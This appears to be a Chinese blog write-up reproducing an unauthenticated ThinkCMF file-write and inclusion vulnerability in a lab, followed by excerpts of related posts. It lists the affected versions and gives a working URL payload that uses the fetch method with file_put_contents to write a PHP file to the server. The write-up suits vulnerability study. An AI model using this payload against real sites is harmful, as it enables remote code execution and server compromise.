ThinkCMF框架任意內容包含漏洞復現

2022-07-25 04:36:07 字數 1185 閱讀 7961

thinkcmf是一款基於php+mysql開發的中文內容管理框架,底層採用thinkphp3.2.3構建。

利用此漏洞無需任何許可權情況下,構造惡意的url,可以向伺服器寫入任意內容的檔案,實現遠端**執行

1     thinkcmf x1.6.0

2 thinkcmf x2.1.0

3 thinkcmf x2.2.0

4 thinkcmf x2.2.1

5 thinkcmf x2.2.2

6 thinkcmf x2.2.3

我用的是phpstudy搭建thinkcmf x2.2.3要用nginx,不然提示沒有許可權

根據安裝嚮導安裝即可

方法一:

通過構造a引數的fetch方法,可以不需要知道檔案路徑就可以把php**寫入檔案

phpinfo版payload如下:

1 ?a=fetch&templatefile=public/index&prefix=''&content=file_put_contents('

test.php

','<?php phpinfo(); ?>

')

利用結果

訪問寫入的檔案

第二種

通過構造a引數的display方法,實現任意內容包含漏洞

ThinkCMF框架任意檔案包含漏洞學習復現小記

跟隨大佬學習,了解學習了thinkcmf任意檔案包含漏洞,並進行了一次滲透,下面來寫個學習筆記記錄一下 thinkcmf x1.6.0 thinkcmf x2.1.0 thinkcmf x2.2.0 thinkcmf x2.2.1 thinkcmf x2.2.2 任何人在無需任何許可權情況下,通過構...

ThinkCMF小程式API開發框架

1.請先安裝thinkcmf5 thinkcmf 根目錄 api api目錄 data 資料目錄 conf 動態配置目錄 runtime 應用的執行時目錄 可寫 更多 public web 部署目錄 對外訪問目錄 api api入口目錄 index php 入口檔案 htaccess apache重...

ThinkCMF框架自定義功能函式

thinkcmf是基於thinkphp開發的一款優秀的內容管理框架,系統本身已經開發好了絕大多數的內容,但是在細節上還有待改進的空間,以下為自定義的功能函式來滿足 開發中的需求!以下為自定義功能函式 以下為自定義功能函式 判斷是否為頂級分類 是 返回頂級分類及其子類id 否 返回該分類id para...